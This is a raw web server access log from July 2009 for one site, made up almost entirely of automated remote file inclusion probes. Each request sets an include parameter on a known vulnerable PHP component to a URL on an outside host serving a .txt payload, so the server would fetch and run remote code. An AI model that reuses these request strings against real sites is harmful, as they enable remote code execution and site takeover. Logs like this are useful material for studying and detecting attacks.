80.248.208.177 - - [05/Jul/2009:10:30:55 -0700] "GET /logs/access_090531.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/idd.txt??%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
94.23.2.21 - - [05/Jul/2009:10:31:01 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/idd.txt??%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.826" "www.puaga.com"
94.23.2.21 - - [05/Jul/2009:10:31:01 -0700] "GET /logs/access_090524.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/idd.txt??%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.826" "www.puaga.com"
94.23.2.21 - - [05/Jul/2009:10:31:01 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/idd.txt??%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.826" "www.puaga.com"
94.23.2.21 - - [05/Jul/2009:10:31:01 -0700] "GET /logs/access_090531.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/idd.txt??%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.826" "www.puaga.com"
94.23.2.21 - - [05/Jul/2009:10:31:26 -0700] "GET /logs/access_090524.log%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/idd.txt??%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.826" "www.puaga.com"
114.200.199.144 - - [05/Jul/2009:10:31:33 -0700] "GET /logs/access_090622.log%20%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.200.199.144 - - [05/Jul/2009:10:31:33 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.200.199.144 - - [05/Jul/2009:10:31:33 -0700] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.87.217.26 - - [05/Jul/2009:10:31:41 -0700] "GET /logs/access_090606.log%20%20//faqsupport/samplefaqsupport.php?path[docroot]=http://www.hit168.com.cn/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.246.20.221 - - [05/Jul/2009:10:31:47 -0700] "GET /logs/access_090606.log//faqsupport/samplefaqsupport.php?path[docroot]=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
114.200.199.144 - - [05/Jul/2009:10:31:52 -0700] "GET /logs/access_090614.log%20%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.174.82.220 - - [05/Jul/2009:10:32:18 -0700] "GET /?DOCUMENT_ROOT=http://computercabling.ca/ta//lib/ram/id1.txt? HTTP/1.1" 200 6125 "-" "Mozilla/5.0" "www.puaga.com"
202.174.82.220 - - [05/Jul/2009:10:32:25 -0700] "GET /logs//?DOCUMENT_ROOT=http://computercabling.ca/ta//lib/ram/id1.txt? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.puaga.com"
202.174.82.220 - - [05/Jul/2009:10:32:54 -0700] "GET /logs/access_090605.log//?DOCUMENT_ROOT=http://computercabling.ca/ta//lib/ram/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.64.195.223 - - [05/Jul/2009:10:34:24 -0700] "GET /logs/access_090619.log//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.64.195.223 - - [05/Jul/2009:10:34:48 -0700] "GET /logs/access_090619.log//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.19.130.218 - - [05/Jul/2009:10:37:48 -0700] "GET /logs/access_090522.log//config/dbutil.bck.php?confdir=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
67.19.130.218 - - [05/Jul/2009:10:37:49 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
67.19.130.218 - - [05/Jul/2009:10:37:49 -0700] "GET /config/dbutil.bck.php?confdir=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
67.19.130.218 - - [05/Jul/2009:10:38:14 -0700] "GET /logs/access_090616.log//config/dbutil.bck.php?confdir=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
70.87.217.26 - - [05/Jul/2009:10:39:11 -0700] "GET /logs/access_090522.log//config/dbutil.bck.php?confdir=http://www.hit168.com.cn/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.87.217.26 - - [05/Jul/2009:10:39:11 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.hit168.com.cn/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.87.217.26 - - [05/Jul/2009:10:39:11 -0700] "GET /config/dbutil.bck.php?confdir=http://www.hit168.com.cn/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
63.223.85.28 - - [05/Jul/2009:10:39:24 -0700] "GET /include/admin.lib.inc.php?site_path=http://jookjunacro.net//bbs/1.txt?%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
63.223.85.28 - - [05/Jul/2009:10:39:24 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://jookjunacro.net//bbs/1.txt?%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
63.223.85.28 - - [05/Jul/2009:10:39:24 -0700] "GET /logs/access_090623.log%20%20//include/admin.lib.inc.php?site_path=http://jookjunacro.net//bbs/1.txt?%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
63.223.85.28 - - [05/Jul/2009:10:39:57 -0700] "GET /logs/access_090527.log%20%20//include/admin.lib.inc.php?site_path=http://jookjunacro.net//bbs/1.txt?%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.246.20.221 - - [05/Jul/2009:10:40:14 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
218.246.20.221 - - [05/Jul/2009:10:40:14 -0700] "GET /config/dbutil.bck.php?confdir=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
218.246.20.221 - - [05/Jul/2009:10:40:15 -0700] "GET /logs/access_090522.log//config/dbutil.bck.php?confdir=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
70.87.217.26 - - [05/Jul/2009:10:40:21 -0700] "GET /logs/access_090522.log%20%20//config/dbutil.bck.php?confdir=http://www.hit168.com.cn/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.87.217.26 - - [05/Jul/2009:10:40:47 -0700] "GET /logs/access_090616.log%20%20//config/dbutil.bck.php?confdir=http://www.hit168.com.cn/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.87.217.26 - - [05/Jul/2009:10:41:23 -0700] "GET /logs/access_090624.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.hit168.com.cn/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.246.20.221 - - [05/Jul/2009:10:41:43 -0700] "GET /logs/access_090616.log//config/dbutil.bck.php?confdir=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
80.237.208.86 - - [05/Jul/2009:10:42:01 -0700] "GET /logs/access_090530.log/images/errors.php?error=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
80.237.208.86 - - [05/Jul/2009:10:42:01 -0700] "GET /images/errors.php?error=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
80.237.208.86 - - [05/Jul/2009:10:42:01 -0700] "GET /logs/images/errors.php?error=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
80.237.208.86 - - [05/Jul/2009:10:42:44 -0700] "GET /logs/access_090526.log/images/errors.php?error=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
70.87.217.26 - - [05/Jul/2009:10:42:57 -0700] "GET /logs/access_090606.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.hit168.com.cn/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.237.208.86 - - [05/Jul/2009:10:43:38 -0700] "GET /logs/access_090623.log%20/images/errors.php?error=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
80.237.208.86 - - [05/Jul/2009:10:43:38 -0700] "GET /logs/access_090524.log%20/images/errors.php?error=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:10:45:38 -0700] "GET /logs/access_090617.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:10:45:38 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:10:45:41 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:10:45:54 -0700] "GET /logs/access_090528.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
63.223.85.28 - - [05/Jul/2009:10:45:57 -0700] "GET /logs/access_090623.log//include/admin.lib.inc.php?site_path=http://jookjunacro.net//bbs/1.txt?%20? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
63.223.85.28 - - [05/Jul/2009:10:46:10 -0700] "GET /logs/access_090527.log//include/admin.lib.inc.php?site_path=http://jookjunacro.net//bbs/1.txt?%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.16.16.206 - - [05/Jul/2009:10:46:16 -0700] "GET /components/com_extcalendar/admin.config.inc.php?CONFIG_EXT[FS_PATH]=http://poisongame.altervista.org/pr.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
70.87.217.26 - - [05/Jul/2009:10:46:25 -0700] "GET /logs/access_090616.log//config/dbutil.bck.php?confdir=http://www.hit168.com.cn/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.16.16.206 - - [05/Jul/2009:10:46:26 -0700] "GET /logs//components/com_extcalendar/admin.config.inc.php?CONFIG_EXT[FS_PATH]=http://poisongame.altervista.org/pr.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
217.16.16.206 - - [05/Jul/2009:10:46:45 -0700] "GET /logs/access_090524.log//components/com_extcalendar/admin.config.inc.php?CONFIG_EXT[FS_PATH]=http://poisongame.altervista.org/pr.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
217.16.16.206 - - [05/Jul/2009:10:46:51 -0700] "GET /logs/access_090531.log//components/com_extcalendar/admin.config.inc.php?CONFIG_EXT[FS_PATH]=http://poisongame.altervista.org/pr.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
80.237.208.86 - - [05/Jul/2009:10:48:59 -0700] "GET /logs/images/errors.php?error=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
80.237.208.86 - - [05/Jul/2009:10:48:59 -0700] "GET /images/errors.php?error=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
80.237.208.86 - - [05/Jul/2009:10:48:59 -0700] "GET /logs/access_090525.log/images/errors.php?error=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
80.237.208.86 - - [05/Jul/2009:10:49:23 -0700] "GET /logs/access_090531.log/images/errors.php?error=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
60.43.229.5 - - [05/Jul/2009:10:50:21 -0700] "GET /logs/config.php?path_to_root=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.43.229.5 - - [05/Jul/2009:10:50:21 -0700] "GET /config.php?path_to_root=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.43.229.5 - - [05/Jul/2009:10:50:24 -0700] "GET /logs/access_090621.log%20%20/config.php?path_to_root=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.43.229.5 - - [05/Jul/2009:10:50:29 -0700] "GET /logs/access_090604.log%20%20/config.php?path_to_root=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.169.210.130 - - [05/Jul/2009:10:50:47 -0700] "GET /logs/access_090524.log/images/errors.php?error=http://www.apromote-werbemittel.de/cache/chi.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
217.169.210.130 - - [05/Jul/2009:10:50:51 -0700] "GET /images/errors.php?error=http://www.apromote-werbemittel.de/cache/chi.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
217.169.210.130 - - [05/Jul/2009:10:50:51 -0700] "GET /logs/images/errors.php?error=http://www.apromote-werbemittel.de/cache/chi.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
66.197.183.21 - - [05/Jul/2009:10:50:54 -0700] "GET /logs/access_090620.log/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://yongsin.es.kr/oil2.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.826" "www.puaga.com"
66.197.183.21 - - [05/Jul/2009:10:50:54 -0700] "GET /logs/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://yongsin.es.kr/oil2.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.826" "www.puaga.com"
66.197.183.21 - - [05/Jul/2009:10:50:54 -0700] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://yongsin.es.kr/oil2.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.826" "www.puaga.com"
63.223.85.28 - - [05/Jul/2009:10:51:01 -0700] "GET /logs/access_090525.log//index.php?abs_path=http://jookjunacro.net//bbs/1.txt?%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
63.223.85.28 - - [05/Jul/2009:10:51:01 -0700] "GET /logs//index.php?abs_path=http://jookjunacro.net//bbs/1.txt?%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
63.223.85.28 - - [05/Jul/2009:10:51:01 -0700] "GET /index.php?abs_path=http://jookjunacro.net//bbs/1.txt?%20? HTTP/1.1" 200 6125 "-" "Mozilla/5.0" "www.puaga.com"
66.197.183.21 - - [05/Jul/2009:10:51:23 -0700] "GET /logs/access_090520.log/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://yongsin.es.kr/oil2.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.826" "www.puaga.com"
217.169.210.130 - - [05/Jul/2009:10:51:43 -0700] "GET /logs/access_090531.log/images/errors.php?error=http://www.apromote-werbemittel.de/cache/chi.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
63.223.85.28 - - [05/Jul/2009:10:53:29 -0700] "GET /logs/access_090525.log%20%20//index.php?abs_path=http://jookjunacro.net//bbs/1.txt?%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.37.60 - - [05/Jul/2009:10:53:52 -0700] "GET /logs/access_090620.log/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://yongsin.es.kr/oil2.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
88.191.37.60 - - [05/Jul/2009:10:53:54 -0700] "GET /logs/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://yongsin.es.kr/oil2.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
88.191.37.60 - - [05/Jul/2009:10:53:54 -0700] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://yongsin.es.kr/oil2.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
60.43.229.5 - - [05/Jul/2009:10:55:20 -0700] "GET /logs/access_090621.log/config.php?path_to_root=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.43.229.5 - - [05/Jul/2009:10:55:25 -0700] "GET /logs/access_090604.log/config.php?path_to_root=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.211.166.243 - - [05/Jul/2009:10:55:31 -0700] "GET /index1.php?site=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.211.166.243 - - [05/Jul/2009:10:55:31 -0700] "GET /logs/index1.php?site=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.211.166.243 - - [05/Jul/2009:10:55:31 -0700] "GET /logs/access_090624.log/index1.php?site=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.211.166.243 - - [05/Jul/2009:10:55:31 -0700] "GET /logs/access_090620.log/index1.php?site=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.211.166.243 - - [05/Jul/2009:10:56:01 -0700] "GET /logs/access_090607.log%20%20/index1.php?site=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.211.166.243 - - [05/Jul/2009:10:56:24 -0700] "GET /logs/access_090624.log%20%20/index1.php?site=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
63.223.85.28 - - [05/Jul/2009:10:56:29 -0700] "GET /logs/access_090520.log//admin/includes/spaw/spaw_control.class.php?spaw_root=http://jookjunacro.net//bbs/1.txt?%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
63.223.85.28 - - [05/Jul/2009:10:56:29 -0700] "GET /admin/includes/spaw/spaw_control.class.php?spaw_root=http://jookjunacro.net//bbs/1.txt?%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
63.223.85.28 - - [05/Jul/2009:10:56:29 -0700] "GET /logs//admin/includes/spaw/spaw_control.class.php?spaw_root=http://jookjunacro.net//bbs/1.txt?%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.43.229.5 - - [05/Jul/2009:10:57:27 -0700] "GET /logs/access.log/config.php?path_to_root=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.230.9.68 - - [05/Jul/2009:10:58:10 -0700] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.puaga.com"
87.230.9.68 - - [05/Jul/2009:10:58:10 -0700] "GET /logs/access_090520.log/?_SERVER[DOCUMENT_ROOT]=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.puaga.com"
87.230.9.68 - - [05/Jul/2009:10:58:10 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 200 6125 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.puaga.com"
88.191.37.60 - - [05/Jul/2009:10:58:23 -0700] "GET /logs/access_090520.log/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://yongsin.es.kr/oil2.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
217.16.16.206 - - [05/Jul/2009:10:59:24 -0700] "GET /modules/TotalCalendar/about.php?inc_dir=http://poisongame.altervista.org/pr.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
218.234.21.178 - - [05/Jul/2009:10:59:26 -0700] "GET /logs/access_090517.log///?_SERVER[DOCUMENT_ROOT]=http://kq-china.com/web/templates/ja_purity/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.234.21.178 - - [05/Jul/2009:10:59:26 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://kq-china.com/web/templates/ja_purity/id1.txt???? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "www.puaga.com"
218.234.21.178 - - [05/Jul/2009:10:59:26 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://kq-china.com/web/templates/ja_purity/id1.txt???? HTTP/1.1" 200 6125 "-" "Mozilla/5.0" "www.puaga.com"
217.16.16.206 - - [05/Jul/2009:10:59:37 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://poisongame.altervista.org/pr.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
63.223.85.28 - - [05/Jul/2009:10:59:38 -0700] "GET /logs/access_090520.log%20%20//admin/includes/spaw/spaw_control.class.php?spaw_root=http://jookjunacro.net//bbs/1.txt?%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.16.16.206 - - [05/Jul/2009:10:59:49 -0700] "GET /logs/access_090605.log//modules/TotalCalendar/about.php?inc_dir=http://poisongame.altervista.org/pr.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
218.234.21.178 - - [05/Jul/2009:11:00:08 -0700] "GET /logs/access_090513.log///?_SERVER[DOCUMENT_ROOT]=http://kq-china.com/web/templates/ja_purity/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:11:00:55 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 200 6125 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:11:00:57 -0700] "GET /logs/access_090612.log/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:11:01:07 -0700] "GET /logs/access_090531.log/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
211.49.99.7 - - [05/Jul/2009:11:01:40 -0700] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.puaga.com"
211.49.99.7 - - [05/Jul/2009:11:01:40 -0700] "GET /logs/access_090520.log/?_SERVER[DOCUMENT_ROOT]=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.puaga.com"
211.49.99.7 - - [05/Jul/2009:11:01:40 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 200 6125 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.puaga.com"
62.211.166.243 - - [05/Jul/2009:11:02:06 -0700] "GET /logs/access.log/index1.php?site=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.16.16.206 - - [05/Jul/2009:11:02:39 -0700] "GET /logs/access_090531.log//modules/TotalCalendar/about.php?inc_dir=http://poisongame.altervista.org/pr.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
212.241.249.222 - - [05/Jul/2009:11:03:19 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.ssp3.ilawa.pl/images/zoom/.bjc/logs/uk1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.211.166.243 - - [05/Jul/2009:11:04:30 -0700] "GET /logs/access_090621.log/index1.php?site=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.108.123.96 - - [05/Jul/2009:11:05:01 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 200 6125 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.puaga.com"
89.108.123.96 - - [05/Jul/2009:11:05:12 -0700] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.puaga.com"
89.108.123.96 - - [05/Jul/2009:11:05:16 -0700] "GET /logs/access_090520.log/?_SERVER[DOCUMENT_ROOT]=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.puaga.com"
74.223.143.131 - - [05/Jul/2009:11:05:46 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.223.143.131 - - [05/Jul/2009:11:05:46 -0700] "GET /logs//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.223.143.131 - - [05/Jul/2009:11:05:47 -0700] "GET /logs/access_090520.log%20%20//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.148.238.69 - - [05/Jul/2009:11:05:57 -0700] "GET /logs/access_090524.log/images/errors.php?error=http://www.tsg-darmstadt.de/images/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
79.148.238.69 - - [05/Jul/2009:11:05:58 -0700] "GET /images/errors.php?error=http://www.tsg-darmstadt.de/images/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
